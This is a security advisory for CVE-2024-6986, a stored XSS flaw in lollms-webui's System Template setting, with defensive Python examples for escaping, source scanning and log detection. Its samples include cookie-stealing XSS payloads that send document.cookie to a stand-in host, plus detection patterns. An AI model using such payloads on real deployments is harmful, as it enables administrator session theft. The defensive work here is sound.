CVE-2024-6986
📋 TL;DR
A stored Cross-site Scripting (XSS) vulnerability in parisneo/lollms-webui allows an attacker who can edit the System Template setting to inject JavaScript into the stored configuration. When an administrator opens the Settings page, the stored value is rendered as HTML and the injected code executes in the administrator's browser with that session's privileges. The issue was reported against lollms-webui version 9.8; any deployment still on that version is affected.
💻 Affected Systems
- parisneo/lollms-webui
⚠️ Risk & Real-World Impact
Worst Case
Attacker gains administrative privileges by stealing session cookies or performing actions as the administrator, potentially leading to complete system compromise.
Likely Case
Attacker steals administrator session cookies, leading to unauthorized access to the web interface and potential data exfiltration.
If Mitigated
Limited impact if only trusted administrators can reach the Settings page and the endpoint that stores the System Template, and if the stored value is escaped before it is rendered.
🎯 Exploit Status
Exploitation requires the ability to write the System Template field, so the attacker needs whatever access the deployment grants to the configuration interface; if the instance is reachable without authentication, any client that can reach it can plant the payload. Because the payload is stored, a single write persists and fires every time an administrator opens the Settings page; no crafted link or further victim interaction is needed.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Version after 9.8
Vendor Advisory: https://huntr.com/bounties/83e9bde1-40b2-49e9-be1c-bc1498eb8ebd
Restart Required: Yes
Instructions:
1. Update to the latest version of lollms-webui.
2. Restart the webui service.
3. Verify the fix by confirming that the Settings view no longer renders the template value with the v-html directive (or that the value is escaped before it is rendered), and that a marker tag stored in the System Template field is shown as literal text.
🔧 Temporary Workarounds
Input Sanitization
Implement server-side input validation and sanitization for the System Template field
Modify the backend code to validate the value before storing it in the full_template variable and to escape it for HTML wherever it is rendered. Prompt templates legitimately contain angle brackets (chat-format control tokens such as <|im_start|>), so stripping or entity-encoding them at storage time would alter the prompt sent to the model; reject only what is never legitimate there (control characters, oversize input) and escape at the output sink.
Restrict Settings Access
Limit access to the Settings page to trusted administrators only
Configure the web server or application firewall to restrict the /settings path, and restrict the API endpoint that writes the configuration as well; blocking only the page leaves the stored value writable by direct requests.
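The Input Sanitization workaround above says to sanitize before storing. As an added example (not lollms-webui code; the function names, the wrapper markup and the length limit are assumptions), the following Python shows storage-time validation that does not damage legitimate prompt templates, next to the vulnerable raw-HTML rendering and the hardened form that escapes at the sink. Both inputs are constructed.

```python
import html
import re

# Constructed sample inputs (not from the original page): a legitimate
# chat-style system template that relies on angle-bracket control tokens, and
# a stored-XSS payload of the kind the advisory describes.
LEGIT_TEMPLATE = "<|im_start|>system\nYou are a helpful assistant.<|im_end|>\n"
XSS_PAYLOAD = '<img src=x onerror="fetch(\'//attacker.invalid/?c=\'+document.cookie)">'

MAX_TEMPLATE_LEN = 8192  # assumed limit; choose one that fits your prompts
# Control characters that never belong in a prompt (tab, LF and CR are allowed).
_BAD_CONTROL = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")
_WRAP_OPEN = '<div id="system-template">'  # assumed wrapper markup
_WRAP_CLOSE = "</div>"


def validate_system_template(value: object) -> list[str]:
    """Storage-time validation. Returns a list of problems (empty means OK).

    It rejects only what is never legitimate in a template and leaves '<' and
    '>' alone, so LEGIT_TEMPLATE passes untouched. Stripping or encoding angle
    brackets here would alter the prompt the model receives.
    """
    if not isinstance(value, str):
        return ["system template must be a string"]
    problems = []
    if len(value) > MAX_TEMPLATE_LEN:
        problems.append(f"longer than {MAX_TEMPLATE_LEN} characters")
    if _BAD_CONTROL.search(value):
        problems.append("contains control characters")
    return problems


def render_settings_vulnerable(template: str) -> str:
    """The unsafe pattern: the stored value is inserted into the page as raw
    HTML. This is the server-side equivalent of binding it with v-html."""
    return f"{_WRAP_OPEN}{template}{_WRAP_CLOSE}"


def render_settings_hardened(template: str) -> str:
    """Escape at the sink. '<', '>', '&', '"' and "'" become entities, so the
    browser displays the template text and never parses it as markup."""
    return f"{_WRAP_OPEN}{html.escape(template, quote=True)}{_WRAP_CLOSE}"


def stored_template_from_page(rendered: str) -> str:
    """Recover the template text from the hardened rendering. Used to show that
    escaping at the sink is lossless for legitimate templates."""
    inner = rendered[len(_WRAP_OPEN):-len(_WRAP_CLOSE)]
    return html.unescape(inner)


if __name__ == "__main__":
    print("vulnerable:", render_settings_vulnerable(XSS_PAYLOAD))
    print("hardened:  ", render_settings_hardened(XSS_PAYLOAD))
    round_trip = stored_template_from_page(render_settings_hardened(LEGIT_TEMPLATE))
    print("legit template survives escaping:", round_trip == LEGIT_TEMPLATE)
    print("validation problems for legit template:", validate_system_template(LEGIT_TEMPLATE))
```

The hardened rendering turns the payload into inert text while the chat-format template round-trips unchanged, which is the property a storage-time HTML stripper cannot give you.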
🧯 If You Can't Patch
- Disable or restrict access to the Settings page entirely
- Serve a Content Security Policy whose script-src does not allow 'unsafe-inline' (use a nonce- or hash-based policy), so that injected inline scripts and event-handler attributes are blocked even if the value is still rendered as HTML; the application's own inline scripts must be adapted to the policy first or the UI will break
🔍 How to Verify
Check if Vulnerable:
Check whether the instance runs version 9.8 of lollms-webui and whether the Settings view renders the full_template value with the v-html directive (search the Vue source for v-html bindings)
Check Version:
Check the webui interface or configuration files for version information
Verify Fix Applied:
After updating, store a harmless marker tag (for example a bold tag wrapping a unique string) in the System Template field, open the Settings page as an administrator and confirm the marker is shown as literal text rather than rendered as markup; a tag that executes script is not needed for this check
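One way to carry out the source check above (find v-html bindings in the Settings view and flag any bound to full_template), as an added example rather than a tool shipped with lollms-webui: a small scanner over a checked-out source tree. The sample templates are constructed, and the tree path and file suffixes are assumptions.

```python
import re
from pathlib import Path

# Matches v-html="expr" or v-html='expr'. re.S lets the expression span lines.
_V_HTML = re.compile(r"""\bv-html\s*=\s*(?P<q>["'])(?P<expr>.*?)(?P=q)""", re.S)


def find_v_html_bindings(source: str, filename: str = "<input>") -> list[dict]:
    """Return every v-html binding in one file's text with its line number
    and the bound expression."""
    findings = []
    for m in _V_HTML.finditer(source):
        line = source.count("\n", 0, m.start()) + 1
        findings.append(
            {"file": filename, "line": line, "expr": m.group("expr").strip()}
        )
    return findings


def flag_untrusted(findings: list[dict], names=("full_template",)) -> list[dict]:
    """Keep only bindings whose expression mentions a known-untrusted name.
    full_template is the variable named in the advisory; add others as needed."""
    pat = re.compile(r"\b(?:" + "|".join(map(re.escape, names)) + r")\b")
    return [f for f in findings if pat.search(f["expr"])]


def scan_tree(root: str, suffixes=(".vue", ".js", ".ts", ".html")) -> list[dict]:
    """Walk a source tree (the path is supplied by the caller) and collect all
    v-html bindings. Run this against the source, not the built bundle: the
    compiler turns v-html into innerHTML assignments that this regex misses."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix in suffixes:
            text = path.read_text(encoding="utf-8", errors="replace")
            findings.extend(find_v_html_bindings(text, str(path)))
    return findings


# Constructed sample templates (not lollms-webui source): the vulnerable pattern
# and one fixed form that shows the value as escaped text.
SAMPLE_VULNERABLE = """<template>
  <div class="settings">
    <label>System Template</label>
    <div class="preview" v-html="full_template"></div>
  </div>
</template>
"""

SAMPLE_FIXED = """<template>
  <div class="settings">
    <label>System Template</label>
    <textarea v-model="full_template"></textarea>
    <pre class="preview">{{ full_template }}</pre>
  </div>
</template>
"""

if __name__ == "__main__":
    import sys

    if len(sys.argv) > 1:
        for f in flag_untrusted(scan_tree(sys.argv[1])):
            print(f"{f['file']}:{f['line']}: v-html bound to {f['expr']}")
    else:
        print("vulnerable sample:", find_v_html_bindings(SAMPLE_VULNERABLE))
        print("fixed sample:", find_v_html_bindings(SAMPLE_FIXED))
```

A clean scan shows only that the template is no longer rendered through v-html; if the value reaches the page by another raw-HTML path (a markdown renderer with HTML enabled, a direct innerHTML assignment), the marker-tag test above is still the check that matters.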
📡 Detection & Monitoring
Log Indicators:
- Unusual modifications to System Template configuration
- JavaScript payloads in configuration logs
Network Indicators:
- Requests to Settings page with suspicious payloads in parameters
SIEM Query:
source="webui_logs" AND ("System Template" OR "full_template") AND ("<script" OR "javascript:" OR "onerror=" OR "onload=" OR "<svg" OR "<img" OR "<iframe")
This literal match misses URL-encoded (%3Cscript) and HTML-entity-encoded (&lt;script) payloads; decode the logged value before matching where the SIEM allows it, and treat the query as illustrative of the log source and field names rather than as a complete signature.
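The SIEM query above matches literal strings only. As an added example, not from the page or the project, the following Python runs equivalent detection logic over constructed configuration-change log lines, decoding URL and HTML-entity encoding first so encoded payloads are caught while chat-format control tokens such as <|im_start|> are not flagged. The log line format is an assumption.

```python
import html
import re
import urllib.parse

# Assumed log format (lollms-webui's real log format is not given on the page):
# "<timestamp> <user> <action> field=<setting name> value=<submitted text>"
_LINE = re.compile(
    r"^(?P<ts>\S+) (?P<user>\S+) (?P<action>\S+) field=(?P<field>\S+) value=(?P<value>.*)$"
)

# Indicators evaluated against the decoded, lower-cased value.
_INDICATORS = [
    ("script-tag", re.compile(r"<script\b")),
    ("event-handler", re.compile(r"\bon[a-z]+\s*=")),
    ("javascript-uri", re.compile(r"javascript\s*:")),
    ("html-data-uri", re.compile(r"data:text/html")),
    ("active-element", re.compile(r"<(?:svg|iframe|object|embed|math)\b")),
]


def normalise(value: str) -> str:
    """Undo URL and HTML-entity encoding (repeatedly, for double encoding) and
    lower-case, so encoded payloads match the same indicators as plain ones."""
    s = value
    for _ in range(3):
        decoded = html.unescape(urllib.parse.unquote(s))
        if decoded == s:
            break
        s = decoded
    return s.lower()


def indicators_for(value: str) -> list[str]:
    norm = normalise(value)
    return [name for name, pat in _INDICATORS if pat.search(norm)]


def scan_log(text: str, fields=("system_template",)) -> list[dict]:
    """Return one finding per log line whose monitored field carries an XSS
    indicator. Lines for other fields and lines that do not parse are skipped."""
    findings = []
    for raw in text.splitlines():
        m = _LINE.match(raw)
        if not m or m.group("field") not in fields:
            continue
        hits = indicators_for(m.group("value"))
        if hits:
            findings.append({"ts": m.group("ts"), "user": m.group("user"),
                             "field": m.group("field"), "indicators": hits})
    return findings


# Constructed sample log. Line 1 is a legitimate chat-format template whose
# angle-bracket tokens must not trigger; lines 2-4 are plain, URL-encoded and
# entity-encoded payloads; line 5 is an unrelated setting.
SAMPLE_LOG = """\
2024-07-23T10:01:02Z admin update_setting field=system_template value=<|im_start|>system You are a helpful assistant.<|im_end|>
2024-07-23T10:05:17Z guest update_setting field=system_template value=<img src=x onerror="fetch('//attacker.invalid/?c='+document.cookie)">
2024-07-23T10:06:40Z guest update_setting field=system_template value=%3Cscript%3Enew%20Image().src%3D%27//attacker.invalid/%3F%27%2Bdocument.cookie%3C/script%3E
2024-07-23T10:07:03Z guest update_setting field=system_template value=&lt;svg onload=alert(1)&gt;
2024-07-23T10:09:55Z admin update_setting field=model_name value=mistral-7b-instruct
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} user={f['user']} field={f['field']} indicators={f['indicators']}")
```

Running the block on the sample prints three findings, all for the guest account; the legitimate template and the unrelated setting produce none. Feed it the decoded value column of your own configuration-change logs and extend _INDICATORS with whatever the SIEM query already covers.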